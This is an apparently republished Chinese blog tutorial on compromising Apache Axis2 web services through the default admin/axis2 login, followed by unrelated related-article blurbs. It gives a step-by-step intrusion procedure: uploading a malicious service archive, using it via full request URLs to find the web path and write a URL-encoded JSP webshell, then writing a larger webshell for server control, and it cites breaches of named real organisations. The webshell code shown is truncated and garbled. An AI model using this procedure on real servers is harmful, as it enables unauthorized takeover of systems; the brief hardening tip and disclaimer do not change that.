利用Axis2默认口令安全漏洞可入侵WebService网站

摘要:
最近,我使用Axis2默认密码安全漏洞入侵了Web服务网站,我跟踪了几个在黑云上使用Axis2默认密码进行渗透测试的案例。每个人的渗透思路基本相同,使用的技术工具也大致相同。我在总结这些案例的基础上扩展了我的技术思路。我使用的URL编码工具是小葵转码,我也可以使用在线转码工具来穿透这个过程:首先,确认目标Web服务网站的后台URL地址。安全增强方法:修改Axis2中conf.xml文件中的Axis2默认帐户名和密码。修改以下两行代码。
利用Axis2默认口令安全漏洞可入侵WebService网站

近期,在乌云上关注了几则利用Axis2默认口令进行渗透测试的案例,大家的渗透思路基本一致,利用的技术工具也大致相同,我在总结这几则案例的基础之上进行了技术思路的拓展。

乌云Axis2默认口令安全弱点利用案例:

航空安全之四川航空某系统漏洞导致Getshell(影响内网60多台主机安全目测已被其他人渗透过)

乐信通某服务器axis2服务存在弱口令可上传webshell(root权限)

中国科学院网Web-services(axis2)系统任意代码执行

工具准备:

Axis2利用工具包: cat.arr

cat.arr工具说明与下载参见大牛“PHP to Java”的博客http://javaweb.org/?p=1548

JSP一句话木马

服务器端一句话木马代码:

<%if(request.getparameter(“f”)!=null)(new>

<%if(request.getparameter(“f”)!=null)(new>

客户端提交代码:

jsp?f=大木马.jsp”" method="”post”">

JSP大马

大马我就不发布出来了,如有需要可发我QQ邮箱2749958485@qq.com索要。

URL编码工具

我用的是小葵转码,也可以利用网上在线的转码工具

渗透流程:

第一步,确认目标WebService网站后台URL地址。

我在本地搭建的后台地址为 http://10.10.10.138:8080/axis2/axis2-admin/ , 按照webservice的部署经验,直接部署在根目录下的网站也比较多,则后台地址多为 http://*.*.*:8080/axis2-web/ 。点击Administration 进入Axis2后台登录界面,输入默认口令admin/axis2,若口令没有被更改则可成功进入后台管理界面。wKioL1bWtLyQRfLlAAH3i3n3zwQ584.jpg

wKiom1bWtN-y-PLAAAHhXk1sCvQ506.jpg

wKiom1bWtbGB2DZgAALNV1eXEuY737.jpg第二步,点击左侧“Upload Service”上传cat.arr,这个arr包实际上是个中马,我们主要利用这个网马的获取web应用路径、写入文件这两个功能。

cat工具上传成功之后,点击左侧“Available Service”可以看到上传的service项“Cat”。

在客户端利用这个网马的getClassPath功能获取当前应用路径

http://10.10.10.137:8080/axis2/services/Cat/getClassPath

wKiom1bWvVSTrEPSAAFMaaNWPTU920.jpg利用文件写入功能往获取的web应用路径下写入服务器端JSP一句话木马,注意此处需要将一句话木马代码先转码成URL编码,另外在URL中添加内容的时候注意不准换行,复制黏贴时要特别注意。

http://10.10.10.137:8080/axis2/services/Cat/writeStringToFile?data=%253C%25if%28request.getParameter%28%25E2%2580%259Cf%25E2%2580%259D%29!%3Dnull%29%28new%2520java.io.Fil&file=/C:/Program%20Files/Apache%20Software%20Foundation/Tomcat%207.0/webapps/axis2/1.jsp&encoding=utf-8&append=false

wKiom1bWvrTRTP-wAAElw4UtVK0568.jpg

第三步,利用JSP一句话木马的客户端提交代码写入JSP大马。在提交表单中填入JSP大马代码,点击提交即可。此处注意自行修改客户端提交代码中的JSP一句话木马文件路径以及要写入的JSP大马文件名。

wKiom1bWv87BVXSBAADq9h42qiE546.jpg第四步,访问上传的大马,即可获得web应用服务器控制权限。

wKiom1bWwaejpBGDAAPV62V2aZE162.jpg

安全加固方法:

修改Axis2默认账户名与口令,具体位置在axis2中的conf.xml文档中,修改如下两行代码。

admin

axis2

【后记】:写本篇文章主要是想说明Axis2默认账户口令的危害,希望大家不要滥用文章中涉及到的渗透技术,共同建立一个良好的信息安全环境。

免责声明:文章转载自《利用Axis2默认口令安全漏洞可入侵WebService网站》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇linux ps命令详解html基值 仿淘宝下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

C#调用Axis2发布的带SoapHeader用户验证的WebService

起因:合作公司提供了一个WebService供我调用,为了保证安全性,要求在SoapHeader中带用户名和密码进行校验。 在获取了对方的WSDL文件后,并未在文件中指明SoapHeader的格式以及要传递的用户名、密码的属性名称。按照C#中调用WebService的常规方法,在测试工程中“添加Web引用”或“添加服务引用”,只看到生成的*.discoma...

微信小程序访问webservice(wsdl)+ axis2发布服务端(Java)

0、主要思路:使用axis2发布webservice服务端,微信小程序作为客户端访问。步骤如下: 1、服务端: 首先微信小程序仅支持访问https的url,且必须是已备案域名。因此前期的服务器端工作需要先做好,本人是申请了个人域名(已备案),并使用阿里云服务器,然后申请免费SSL,通过配置tomcat完成支持https访问。此外,intellJ IDE的j...

java部署web service的方式

部署web service的方式一般有两种: 1. 编写java源文件,将文件的java后缀改为jws,然后部署到webapps/axis目录下,axia引擎可以直接执行源文件中定义的java方法为web service;另外,要让你的web应用服务器识别jws文件需要确定已在web.xml中配置servlet(如果你依照本文方法采用拷贝axis目录为工...

echarts之tooltip-trigger

名称 类型 默认值 可选值 效果 trigger string ‘item’ ‘item’,’axis’ 触发类型,默认数据触发 当trigger为’item’ tooltip : { trigger: 'item' }   当trigger为’axis’ tooltip : { trigger: 'axis'...

Webservice接口和Http接口

WebService又是一种高级应用,与之前学习的Struts、Spring、Hibernate等框架不同。WebService是面向服务的架构(SOA),看起来像是比SSH框架要大。那么它到底是做什么用的?什么才是面向服务的架构? 让我们来看一种需求,集团公司可能具有多种WEB应用。比如,前年开发了个进销存系统、去年开发了一个ERP、今年又开发了一个OA...

如何在 Matlab 中绘制带箭头的坐标系

如何在 Matlab 中绘制带箭头的坐标系 如何在 Matlab 中绘制带箭头的坐标系 实现原理 演示效果 完整代码 实现原理 使用 matlab 的绘制函数时,默认设置为一个方框形的坐标系, 图1 如果想要绘制的如下图所示中的带箭头的坐标系,需要如何实现呢? 图2 方法一:通过设置 axis 对象 的属性来调整坐标轴,参考代码如下: % 通过...